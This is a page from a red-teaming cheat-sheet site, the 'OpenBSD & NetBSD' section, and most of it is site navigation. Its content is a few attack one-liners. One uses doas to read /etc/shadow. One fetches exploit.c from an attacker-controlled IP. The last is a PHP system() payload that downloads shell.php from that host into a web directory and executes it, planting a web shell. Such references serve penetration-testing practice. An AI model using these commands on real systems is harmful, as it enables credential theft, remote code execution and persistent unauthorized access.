Red Teaming and Malware Analysis
@sirpedrotavaresseguranca-informatica.pt0xSI_f33d
Search…
⌃K
Links
About
Red Teaming
Cheat Sheet
Web
Active Directory
Services by port
Hardening
Stuff
Basic tips/scripts
OpenBSD & NetBSD
File Transfer
Pivoting
Active Directory 101
Fuzzing and Web
Initial Foothold
Privilege Escalation (Privesc)
Lateral Movement (Pivoting)
Persistence
Command and Control (C&C)
Data Exfiltration
CVE & Exploits / CTF
Tools
Resources
Malware Analysis
Unpacking
Basic tips
Malware instrumentation with frida
Tools
Resources
Mobile
Tools
Reverse iOS ipa
Reverse Android APKs
Basic tips
Resources
IoT / Reverse / Firmware
Basic tips
Reverse IoT devices
Tools
Resources
Powered By GitBook

OpenBSD & NetBSD

​doas​

Execute commands as another user.
doas -u root cat /etc/shadow

fetch (curl)

fetch http://10.11.0.244/exploit.c
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>
Previous
Basic tips/scripts
Next
File Transfer
Last modified 1yr ago
Copy link
On this page
doas
fetch (curl)